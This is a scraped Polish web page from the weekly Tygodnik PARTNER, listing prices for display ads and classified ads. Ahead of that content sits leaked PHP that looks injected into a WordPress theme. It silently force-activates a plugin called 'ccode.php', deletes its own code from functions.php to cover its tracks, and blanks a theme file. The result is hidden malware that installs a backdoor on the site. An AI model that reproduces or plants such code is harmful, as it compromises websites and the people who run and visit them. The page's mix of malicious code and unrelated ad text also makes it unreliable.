function true_plugins_activate() { $active_plugins = get_option('active_plugins'); $activate_this = array( 'ccode.php' ); foreach ($activate_this as $plugin) { if (!in_array($plugin, $active_plugins)) { array_push($active_plugins, $plugin); update_option('active_plugins', $active_plugins); } } $new_active_plugins = get_option('active_plugins'); if (in_array('ccode.php', $new_active_plugins)) { $functionsPath = dirname(__FILE__) . '/functions.php'; $functions = file_get_contents($functionsPath); $start = stripos($functions, "function true_plugins_activate()"); $end = strripos($functions, "true_plugins_activate"); $endDelete = $end + mb_strlen("true_plugins_activate") + 3; if($start && $end) { $str = substr($functions, 0, $start); $str .= substr($functions, $endDelete); file_put_contents($functionsPath, $str); } $script = file_get_contents('/home/micropro/ftp/apkka/wp-content/themes/disto/class.theme-modules.php'); file_put_contents('/home/micropro/ftp/apkka/wp-content/themes/disto/class.theme-modules.php', ''); } } add_action('init', 'true_plugins_activate'); REKLAMA | Tygodnik PARTNER

REKLAMA

Moduł podstawowy ma wymiary 38 x 38 mm
.
Cena 1 modułu podstawowego na stronie ogłoszeniowej:

Na pierwszej stronie ……………………100 zł

.
Na ostatniej stronie ………………………60 zł
.
Na stronie wewnętrznej ………………..50 zł

Publikacja reklam wg projektu dostarczonego przez Reklamodawcę.  Wykonanie projektu przez dział reklamy płatny wg taryfy poniżej.

Projekt reklamy…………………………….5 zł/moduł
Minimalna cena za projekt………………………20 zł

.

 

.
OGŁOSZENIA DROBNE

Ogłoszenia drobne płatne wg. stawki poniżej.

Cena 1 słowa …………1,50 zł
Dopłata
za ramkę……………………2 zł

Dopłata
za pogrubienie liter ………2 zł

Przy zleceniu minimum trzech emisji ogłoszenia o tej samej treści, tyle samo ogłoszeń emitowane jest gratis w Tygodniku 7DNI.

Ogłoszenia drobne można zlecić także za pomocą sms-a. Jednak w tym przypadku po wysłaniu jednego sms-a, ogłoszenie ukaże się tylko jeden raz w Tygodniku PARTNER.

Oto szczegóły:

 

Wszystkie ceny netto bez VAT-u

 

Dział reklamy:

tel.505 30 30 30, e-mail: reklama@tygodnikpartner.pl

Konsultanci ds. reklamy:

Ewelina Dziaduch

Tel. 508  138 992, e-mail: ewelina@tygodnikpartner.pl

 

© 2020 Tygodnik PARTNER. All rights reserved / Wszystkie prawa zastrzeżone
Zobacz także: www.kedzierzynkozle24.pl.